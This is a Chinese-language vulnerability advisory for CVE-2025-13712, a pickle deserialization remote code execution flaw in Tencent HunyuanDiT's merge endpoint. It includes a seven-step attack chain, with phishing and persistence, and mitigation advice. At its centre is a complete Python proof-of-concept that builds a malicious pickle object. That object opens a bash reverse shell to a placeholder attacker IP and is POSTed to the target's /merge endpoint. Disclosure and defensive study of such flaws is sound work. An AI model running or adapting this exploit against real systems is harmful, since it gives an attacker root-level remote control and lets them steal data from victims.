CVE-2025-13712: 腾讯HunyuanDiT merge端点反序列化远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-13712

漏洞类型

远程代码执行 - 反序列化漏洞

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Tencent HunyuanDiT

漏洞概述

CVE-2025-13712是腾讯HunyuanDiT中的一个高危安全漏洞，CVSS评分达到7.8。该漏洞存在于HunyuanDiT的merge端点中，由于缺乏对用户输入数据的正确验证，导致可对不受信任的数据进行反序列化操作。攻击者可以利用此漏洞在受影响的系统上以root权限执行任意代码。由于该漏洞需要用户交互才能利用，攻击者需要诱导目标用户访问恶意页面或打开恶意文件。一旦成功利用，攻击者可以获得系统的完全控制权，执行恶意命令、安装后门或窃取敏感数据。此漏洞由ZDI（Zero Day Initiative）披露，编号为ZDI-CAN-27190。

技术细节

该漏洞的根本原因在于HunyuanDiT的merge端点对用户提供的输入数据缺少充分的安全验证。在机器学习模型的合并操作中，系统需要处理各种序列化格式的模型权重数据。攻击者可以通过构造特定的恶意序列化数据，在反序列化过程中触发代码执行。具体来说，攻击者利用Python的pickle反序列化机制，通过构造包含恶意__reduce__方法的Python对象，当系统对这些数据进行反序列化时，会自动执行攻击者预设的代码。攻击者可以构造一个恶意的pickle对象，其中包含反弹shell的命令或下载并执行恶意载荷的代码。由于merge端点直接处理用户输入而没有进行安全过滤，攻击者可以绕过安全检查并获得系统root权限执行任意命令。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标系统中运行的Tencent HunyuanDiT服务，并确认其版本存在CVE-2025-13712漏洞

STEP 2

步骤2

构造恶意载荷：攻击者创建一个Python pickle序列化对象，其中包含恶意的__reduce__方法，该方法在反序列化时执行系统命令

STEP 3

步骤3

诱导用户交互：攻击者通过钓鱼邮件、恶意链接或社交工程手段，诱导目标用户访问包含恶意载荷的网页或提交恶意请求

STEP 4

步骤4

发送恶意请求：攻击者向HunyuanDiT的/merge端点发送POST请求，携带精心构造的序列化恶意数据

STEP 5

步骤5

触发反序列化：服务器端点接收到恶意数据后，由于缺少输入验证，直接对不受信任的数据进行pickle反序列化操作

STEP 6

步骤6

代码执行：反序列化过程中自动执行恶意对象中的__reduce__方法，攻击者获得系统root权限，实现远程代码执行

STEP 7

步骤7

持久化控制：攻击者可在受控系统上安装后门、窃取数据或横向移动攻击其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import pickle
import base64
import os

# CVE-2025-13712 PoC - HunyuanDiT merge endpoint deserialization RCE
# Target: Tencent HunyuanDiT merge endpoint

class Exploit:
    def __reduce__(self):
        # Reverse shell payload - change IP/PORT as needed
        cmd = "bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1"
        return (os.system, (cmd,))

def generate_malicious_payload():
    """Generate malicious pickle payload for deserialization attack"""
    exploit = Exploit()
    payload = pickle.dumps(exploit)
    return base64.b64encode(payload).decode()

def exploit_hunyuan_dit(target_url):
    """
    Exploit HunyuanDiT merge endpoint deserialization vulnerability
    
    Args:
        target_url: Base URL of vulnerable HunyuanDiT instance
    
    Returns:
        bool: True if exploit sent successfully, False otherwise
    """
    payload = generate_malicious_payload()
    
    # Target the merge endpoint with malicious serialized data
    endpoint = f"{target_url}/merge"
    
    # Craft request with malicious payload
    data = {
        "model_data": payload,
        "merge_strategy": "weighted",
        "weights": [0.5, 0.5]
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "HunyuanDiT-Client/1.0"
    }
    
    try:
        response = requests.post(endpoint, json=data, headers=headers, timeout=10)
        return response.status_code == 200
    except requests.exceptions.RequestException:
        return False

if __name__ == "__main__":
    # Usage example
    target = "http://target:8080"
    exploit_hunyuan_dit(target)

影响范围

Tencent HunyuanDiT < commit d2cb9cde5c9dc6a6c01735dcb92fe7699ddf6bc5

防御指南

临时缓解措施

在官方修复发布之前，建议采取以下临时缓解措施：1) 限制对merge端点的访问，只允许受信任的IP地址访问；2) 在应用层实现输入过滤，阻止包含可疑序列化数据的请求；3) 监控和记录所有对merge端点的请求，以便及时发现攻击行为；4) 考虑暂时禁用merge功能或实施严格的访问控制；5) 增强网络隔离，限制HunyuanDiT服务与其他关键系统的网络连接。